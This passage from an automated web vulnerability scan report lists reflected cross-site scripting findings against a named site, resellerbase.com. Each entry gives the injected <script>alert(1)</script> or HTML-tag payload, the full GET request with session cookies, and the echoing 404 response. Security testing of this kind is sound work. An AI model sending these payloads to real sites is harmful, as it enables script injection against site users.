<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail58950<script>alert(1)</script>eff6a5a8cd2/39/rating.php was not found on this server.</p>
...[SNIP]...

2.2642. http://www.resellerbase.com/detail/39/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ba14a<script>alert(1)</script>d44f1af7daf89739e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detailba14a<script>alert(1)</script>d44f1af7daf89739e/39/rating.php?id=39&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/webcams-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailba14a<script>alert(1)</script>d44f1af7daf89739e/39/rating.php?id=39&rating=5 was not found on this server.</p>
...[SNIP]...

2.2643. http://www.resellerbase.com/detail/39/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 27531<script>alert(1)</script>5da8b6dce1d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3927531<script>alert(1)</script>5da8b6dce1d/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3927531<script>alert(1)</script>5da8b6dce1d/rating.php was not found on this server.</p>
...[SNIP]...

2.2644. http://www.resellerbase.com/detail/39/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 48b9d<script>alert(1)</script>6ebda9e4a27a6a35a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/3948b9d<script>alert(1)</script>6ebda9e4a27a6a35a/rating.php?id=39&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/webcams-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3948b9d<script>alert(1)</script>6ebda9e4a27a6a35a/rating.php?id=39&rating=5 was not found on this server.</p>
...[SNIP]...

2.2645. http://www.resellerbase.com/detail/39/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b1954<script>alert(1)</script>27dace852da14511d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/39/rating.phpb1954<script>alert(1)</script>27dace852da14511d?id=39&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/webcams-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/rating.phpb1954<script>alert(1)</script>27dace852da14511d?id=39&rating=5 was not found on this server.</p>
...[SNIP]...

2.2646. http://www.resellerbase.com/detail/39/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 52fd2<script>alert(1)</script>074911faa4a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/rating.php52fd2<script>alert(1)</script>074911faa4a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/rating.php52fd2<script>alert(1)</script>074911faa4a was not found on this server.</p>
...[SNIP]...

2.2647. http://www.resellerbase.com/detail/39/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 365d7<script>alert(1)</script>3d378e747fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/rating.php?365d7<script>alert(1)</script>3d378e747fa=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/rating.php?365d7<script>alert(1)</script>3d378e747fa=1 was not found on this server.</p>
...[SNIP]...

2.2648. http://www.resellerbase.com/detail/39/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3a0f5<script>alert(1)</script>4f7158e6b71ec8888 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/39/rating.php/3a0f5<script>alert(1)</script>4f7158e6b71ec8888?id=39&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/webcams-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/rating.php/3a0f5<script>alert(1)</script>4f7158e6b71ec8888?id=39&rating=5 was not found on this server.</p>
...[SNIP]...

2.2649. http://www.resellerbase.com/detail/39/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 78a85<script>alert(1)</script>b466006986d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail78a85<script>alert(1)</script>b466006986d/39/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/webcams-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail78a85<script>alert(1)</script>b466006986d/39/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2650. http://www.resellerbase.com/detail/39/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 29a67<script>alert(1)</script>1ba91f585d8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3929a67<script>alert(1)</script>1ba91f585d8/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/webcams-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3929a67<script>alert(1)</script>1ba91f585d8/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2651. http://www.resellerbase.com/detail/39/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ba2c9<script>alert(1)</script>67fe49afd61 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/search.phpba2c9<script>alert(1)</script>67fe49afd61?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/webcams-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/search.phpba2c9<script>alert(1)</script>67fe49afd61?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2652. http://www.resellerbase.com/detail/39/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/39/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 63162<a>0ad7bb11d72 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/39/search.php?keyword=search...&Submit3=Search63162<a>0ad7bb11d72&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/webcams-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/search.php?keyword=search...&Submit3=Search63162<a>0ad7bb11d72&opt=2 was not found on this server.</p>
...[SNIP]...

2.2653. http://www.resellerbase.com/detail/39/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/39/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c377c<a>7698aadf203 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/39/search.php?keyword=search...c377c<a>7698aadf203&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/webcams-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/search.php?keyword=search...c377c<a>7698aadf203&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2654. http://www.resellerbase.com/detail/39/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6e869<script>alert(1)</script>382c771853d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/search.php?keyword=search...&Submit3=Search&opt=2&6e869<script>alert(1)</script>382c771853d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/webcams-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/search.php?keyword=search...&Submit3=Search&opt=2&6e869<script>alert(1)</script>382c771853d=1 was not found on this server.</p>
...[SNIP]...

2.2655. http://www.resellerbase.com/detail/39/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/39/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 496e8<a>12b71569d8 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/39/search.php?keyword=search...&Submit3=Search&opt=2496e8<a>12b71569d8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/webcams-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/search.php?keyword=search...&Submit3=Search&opt=2496e8<a>12b71569d8 was not found on this server.</p>
...[SNIP]...

2.2656. http://www.resellerbase.com/detail/39/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 402aa<script>alert(1)</script>22e32bba20f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail402aa<script>alert(1)</script>22e32bba20f/39/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail402aa<script>alert(1)</script>22e32bba20f/39/themes/ was not found on this server.</p>
...[SNIP]...

2.2657. http://www.resellerbase.com/detail/39/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b84c3<script>alert(1)</script>6c68632eaaf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39b84c3<script>alert(1)</script>6c68632eaaf/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39b84c3<script>alert(1)</script>6c68632eaaf/themes/ was not found on this server.</p>
...[SNIP]...

2.2658. http://www.resellerbase.com/detail/39/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f6801<script>alert(1)</script>72aa5856366 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themesf6801<script>alert(1)</script>72aa5856366/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themesf6801<script>alert(1)</script>72aa5856366/ was not found on this server.</p>
...[SNIP]...

2.2659. http://www.resellerbase.com/detail/39/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e1365<script>alert(1)</script>0aca5078e2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/?e1365<script>alert(1)</script>0aca5078e2e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.2660. http://www.resellerbase.com/detail/39/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c23b0<script>alert(1)</script>79d1103fdc0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailc23b0<script>alert(1)</script>79d1103fdc0/39/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc23b0<script>alert(1)</script>79d1103fdc0/39/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2661. http://www.resellerbase.com/detail/39/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c0e9d<script>alert(1)</script>3a58a6b4c8f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39c0e9d<script>alert(1)</script>3a58a6b4c8f/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
